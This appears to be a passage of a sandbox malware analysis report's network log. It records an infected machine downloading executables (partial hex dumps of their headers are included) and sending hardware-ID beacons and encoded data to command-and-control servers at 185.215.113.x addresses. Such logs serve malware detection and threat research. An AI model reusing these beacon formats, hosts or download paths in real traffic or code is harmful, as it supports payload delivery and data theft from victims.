00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 25 00 00 10 00 00 00 28 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 c0 25 00 00 00 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 d0 25 00 00 02 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 70 29 00 00 e0 25 00 00 02 00 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 6a 61 6f 78 77 61 64 00 80 19 00 00 50 4f 00 00 78 19 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 78 77 76 64 61 64 75 00 10 00 00 00 d0 68 00 00 06 00 00 00 b4 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 68 00 00 22 00 00 00 ba 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 23 Oct 2024 13:48:23 GMTContent-Type: application/octet-streamContent-Length: 2850816Last-Modified: Wed, 23 Oct 2024 13:13:56 GMTConnection: keep-aliveETag: "6718f694-2b8000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 e0 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 2c 00 00 04 00 00 c7 c9 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6f 68 70 70 67 65 78 6a 00 20 2b 00 00 a0 00 00 00 20 2b 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 72 6c 64 6a 6e 68 63 00 20 00 00 00 c0 2b 00 00 04 00 00 00 5a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 e0 2b 00 00 22 00 00 00 5e 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 23 Oct 2024 13:49:08 GMTContent-Type: application/octet-streamContent-Length: 2994688Last-Modified: Wed, 23 Oct 2024 13:34:38 GMTConnection: keep-aliveETag: "6718fb6e-2db200"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 4a f1 ff 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 a0 04 00 00 dc 00 00 00 00 00 00 00 30 31 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 31 00 00 04 00 00 96 77 2e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 f0 05 00 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 f1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 05 00 00 10 00 00 00 5e 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 e0 05 00 00 00 00 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 f0 05 00 00 02 00 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 68 69 6e 68 62 64 75 7a 00 20 2b 00 00 00 06 00 00 1c 2b 00 00 70 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 70 69 70 70 76 79 62 00 10 00 00 00 20 31 00 00 04 00 00 00 8c 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 30 31 00 00 22 00 00 00 90 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 23 Oct 2024 13:49:18 GMTContent-Type: application/octet-streamContent-Length: 1825792Last-Modified: Wed, 23 Oct 2024 13:34:44 GMTConnection: keep-aliveETag: "6718fb74-1bdc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4a 9a f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 e0 68 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 69 00 00 04 00 00 f0 c9 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 25 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 25 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 25 00 00 10 00 00 00 28 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 c0 25 00 00 00 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 d0 25 00 00 02 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 70 29 00 00 e0 25 00 00 02 00 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 6a 61 6f 78 77 61 64 00 80 19 00 00 50 4f 00 00 78 19 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 78 77 76 64 61 64 75 00 10 00 00 00 d0 68 00 00 06 00 00 00 b4 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 68 00 00 22 00 00 00 ba 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 23 Oct 2024 13:49:27 GMTContent-Type: application/octet-streamContent-Length: 919552Last-Modified: Wed, 23 Oct 2024 13:13:28 GMTConnection: keep-aliveETag: "6718f678-e0800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 70 f6 18 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 58 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 0e 00 00 04 00 00 f0 fc 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 28 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 9c 00 00 00 40 0d 00 00 9e 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 e0 0d 00 00 76 00 00 00 92 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 23 Oct 2024 13:49:32 GMTContent-Type: application/octet-streamContent-Length: 314368Last-Modified: Sun, 29 Sep 2024 08:19:54 GMTConnection: keep-aliveETag: "66f90daa-4cc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 4a 9a f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 f0 69 01 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 26 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 aa 02 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 25 00 e0 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 04 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8f cc 01 00 00 10 00 00 00 ce 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e0 2e 72 64 61 74 61 00 00 8c cf 00 00 00 e0 01 00 00 d0 00 00 00 d2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a4 03 23 00 00 b0 02 00 00 e4 01 00 00 a2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 9e 45 00 00 00 c0 25 00 00 46 00 00 00 86 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGCFBAFBFHJEBGCAEGHHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 43 46 42 41 46 42 46 48 4a 45 42 47 43 41 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 33 39 41 35 35 45 41 33 39 42 44 33 31 32 30 36 34 31 37 38 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 46 42 41 46 42 46 48 4a 45 42 47 43 41 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 46 42 41 46 42 46 48 4a 45 42 47 43 41 45 47 48 2d 2d 0d 0a Data Ascii: ------JDGCFBAFBFHJEBGCAEGHContent-Disposition: form-data; name="hwid"739A55EA39BD3120641781------JDGCFBAFBFHJEBGCAEGHContent-Disposition: form-data; name="build"doma------JDGCFBAFBFHJEBGCAEGH--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 39 37 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000976001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 39 37 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000977001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAKFCGIJKJKFHIDHIIIHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 33 39 41 35 35 45 41 33 39 42 44 33 31 32 30 36 34 31 37 38 31 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 49 2d 2d 0d 0a Data Ascii: ------HDAKFCGIJKJKFHIDHIIIContent-Disposition: form-data; name="hwid"739A55EA39BD3120641781------HDAKFCGIJKJKFHIDHIIIContent-Disposition: form-data; name="build"doma------HDAKFCGIJKJKFHIDHIII--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 39 37 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000978001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCBFIJJECFIEBGDGCFIJHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 42 46 49 4a 4a 45 43 46 49 45 42 47 44 47 43 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 33 39 41 35 35 45 41 33 39 42 44 33 31 32 30 36 34 31 37 38 31 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 46 49 4a 4a 45 43 46 49 45 42 47 44 47 43 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 46 49 4a 4a 45 43 46 49 45 42 47 44 47 43 46 49 4a 2d 2d 0d 0a Data 